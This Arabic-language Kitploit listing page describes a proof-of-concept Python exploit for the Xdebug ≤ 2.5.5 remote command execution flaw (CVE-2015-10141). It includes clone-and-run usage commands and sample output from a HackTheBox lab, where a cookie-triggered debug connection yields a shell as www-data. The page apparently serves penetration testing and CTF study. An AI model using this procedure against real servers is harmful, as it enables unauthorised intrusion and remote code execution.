Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2015-10141-Xdebug — نص برمجي استغلالي (إثبات مفهوم) لـ Xdebug الإصدار 2.5.5 والإصدارات الأقدم (CVE-2015-10141). | Kitploit
أدوات/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

نص برمجي استغلالي (إثبات مفهوم) لـ Xdebug الإصدار 2.5.5 والإصدارات الأقدم (CVE-2015-10141).

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC-CVE-2015-10141

استغلال مخصص بلغة Python لثغرة Xdebug الإصدار ≤ 2.5.5 (CVE-2015-10141).


الوصف

يحتوي هذا المستودع على إثبات المفهوم (PoC) الخاص بي لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Xdebug للإصدارات 2.5.5 والإصدارات الأقدم.
يستغل السكريبت بروتوكول التصحيح غير المُوثَّق المكشوف على المنفذ 9000 لتحقيق تنفيذ الأوامر عن بُعد.

  • الثغرة: CVE-2015-10141
  • نوع الثغرة: تنفيذ الأوامر عن بُعد (RCE)
  • البرنامج المُتأثر: Xdebug الإصدار ≤ 2.5.5

الاستخدام

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

عند الطلب، أدخل عنوان IP الهدف الذي يستضيف Xdebug.

توضيح من كتابتي الأخيرة لـ HackTheBox Olympus (متوسطة):

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

المتطلبات

  • Python 3.x
  • الهدف يشغّل Xdebug الإصدار ≤ 2.5.5 مع تفعيل التصحيح عن بُعد

إخلاء المسؤولية

تم إنشاء هذا المشروع لأغراض تعليمية فقط.

لا تستخدم هذا الاستغلال ضد الأنظمة دون إذن صريح. لست مسؤولاً عن أي إساءة استخدام لهذا الكود.


المراجع

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • الموقع الرسمي لـ Xdebug
تنزيل الأداة